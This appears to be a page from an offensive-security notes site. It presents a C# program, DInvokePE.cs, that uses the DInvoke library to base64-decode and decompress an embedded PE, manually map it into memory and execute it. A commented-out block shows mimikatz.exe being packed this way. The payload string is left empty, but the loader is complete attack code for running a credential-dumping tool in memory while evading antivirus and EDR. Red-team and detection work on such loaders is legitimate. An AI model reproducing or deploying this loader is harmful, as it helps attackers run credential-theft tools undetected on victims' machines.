D/Invoke
Dynamic API Invocation
DInvokePE.cs
using System;
using System.IO;
using System.IO.Compression;
namespace DInvokePE
{
public class Program
{
static byte[] Compress(byte[] data)
{
MemoryStream output = new MemoryStream();
using (DeflateStream dStream = new DeflateStream(output, CompressionLevel.Optimal))
dStream.Write(data, 0, data.Length);
return output.ToArray();
}
static byte[] Decompress(byte[] data)
{
MemoryStream input = new MemoryStream(data);
MemoryStream output = new MemoryStream();
using (DeflateStream dStream = new DeflateStream(input, CompressionMode.Decompress))
dStream.CopyTo(output);
return output.ToArray();
}
public static void Main(string[] args)
{
/*
var rawBytes = File.ReadAllBytes(@"C:\Users\snovvcrash\Desktop\mimikatz.exe");
var compressed = Compress(rawBytes);
var compressedB64 = Convert.ToBase64String(compressed);
Console.WriteLine(compressedB64);
*/
var compressed = Convert.FromBase64String("");
var rawBytes = Decompress(compressed);
DInvoke.Data.PE.PE_MANUAL_MAP map = DInvoke.ManualMap.Map.MapModuleToMemory(rawBytes);
DInvoke.DynamicInvoke.Generic.CallMappedPEModule(map.PEINFO, map.ModuleBase);
Console.ReadLine();
}
}
}
Last modified 14d ago